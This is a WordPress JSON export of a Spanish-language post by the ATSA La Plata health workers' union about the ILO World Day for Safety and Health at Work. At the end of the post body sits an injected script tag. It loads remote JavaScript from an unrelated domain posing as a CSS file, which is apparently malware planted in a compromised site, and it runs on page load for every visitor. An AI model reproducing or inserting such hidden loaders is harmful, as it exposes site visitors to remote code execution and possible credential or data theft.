{"id":18369,"date":"2025-04-28T00:00:00","date_gmt":"2025-04-28T03:00:00","guid":{"rendered":"http:\/\/atsalaplata.org.ar\/web\/?p=18369"},"modified":"2026-02-02T17:13:05","modified_gmt":"2026-02-02T20:13:05","slug":"dia-mundial-de-la-seguridad-y-salud","status":"publish","type":"post","link":"http:\/\/atsalaplata.org.ar\/web\/2025\/04\/dia-mundial-de-la-seguridad-y-salud\/","title":{"rendered":"D\u00eda Mundial de la Seguridad y Salud"},"content":{"rendered":"\n<p>El 28 de abril, la Organizaci\u00f3n Internacional del Trabajo (OIT) celebra el D\u00eda Mundial de la Seguridad y Salud en el Trabajo para promover la prevenci\u00f3n de accidentes y enfermedades profesionales a nivel mundial.<\/p>\n\n\n\n<p>Esta fecha tambi\u00e9n sirve para llamar la atenci\u00f3n sobre las tendencias emergentes en el \u00e1mbito de la seguridad y salud en el \u00e1mbito laboral, y sobre la magnitud de las lesiones, enfermedades y muertes relacionadas con el trabajo en todo el mundo.<\/p>\n\n\n\n<p>#SanidadAtsaLaPlata #SiempreJuntoAVos<\/p>\n\n\n\n<p><\/p>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>El 28 de abril, la Organizaci\u00f3n Internacional del Trabajo (OIT) celebra el D\u00eda Mundial de&#8230;<\/p>\n","protected":false},"author":2,"featured_media":18370,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[146,98,147,81,97,85,148],"tags":[],"class_list":["post-18369","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-destacado","category-home","category-novedades","category-salud","category-sec-de-cultura","category-sec-de-prensa","category-ultimas-noticias"],"_links":{"self":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18369","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/comments?post=18369"}],"version-history":[{"count":2,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18369\/revisions"}],"predecessor-version":[{"id":20829,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18369\/revisions\/20829"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media\/18370"}],"wp:attachment":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media?parent=18369"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/categories?post=18369"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/tags?post=18369"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}